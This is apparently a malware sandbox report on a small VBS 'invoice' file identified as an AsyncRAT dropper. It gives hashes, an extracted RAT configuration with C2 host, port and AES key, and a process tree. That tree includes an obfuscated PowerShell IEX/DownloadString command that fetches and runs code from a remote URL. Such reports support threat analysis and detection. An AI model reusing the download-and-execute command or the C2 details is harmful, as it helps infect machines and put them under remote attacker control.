Overview

overview

10

Static

static

invoice-ID...12.vbs

windows7_x64

10

invoice-ID...12.vbs

windows10_x64

10

Analysis

  • max time kernel
    17s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    07-01-2021 07:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice-ID3626307348012.vbs

  • Size

    324B

  • MD5

    50f7355426061a1952f878e61e072d5e

  • SHA1

    90156383d18b6851298d1c68f0cca24f6c7375fe

  • SHA256

    a412a3bdf6e8891fa60734b53430db5d0ac8dce28a764fd013dd767614790c45

  • SHA512

    959e8b1cc6eb2e4cf8670567f60aa496ae5af2920b40d8fa9e0705058f57e2e4a8dac029af55514c9a20d5fad4fdd951d676dcaecd33795964dee3ff0a3a5d06

Score
10/10
asyncratrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.minpic.de/k/bfqj/2ipze/

Extracted

Family

asyncrat

Version

0.5.7B

C2

saico015.linkpc.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    9FovObaHt9uwQBnog9MPOAzupINFTyW8

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    saico015.linkpc.net

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6666

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-ID3626307348012.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:508
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://www.minpic.de/k/bfqk/14x9vi/
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bfqj/2ipze/'))))
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3304
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:1364

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1364-9-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize

      72KB

      Download
    • memory/1364-10-0x000000000040C73E-mapping.dmp
      Download
    • memory/1364-11-0x00000000735C0000-0x0000000073CAE000-memory.dmp
      Filesize

      6.9MB

      Download
    • memory/1896-2-0x0000000000000000-mapping.dmp
      Download
    • memory/3304-3-0x0000000000000000-mapping.dmp
      Download
    • memory/3304-4-0x00007FF9A48F0000-0x00007FF9A52DC000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/3304-5-0x00000257EB7B0000-0x00000257EB7B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3304-6-0x00000257EB960000-0x00000257EB961000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3304-7-0x00000257EB8E0000-0x00000257EB8E7000-memory.dmp
      Filesize

      28KB

      Download
    • memory/3304-8-0x00000257EB8F0000-0x00000257EB8F8000-memory.dmp
      Filesize

      32KB

      Download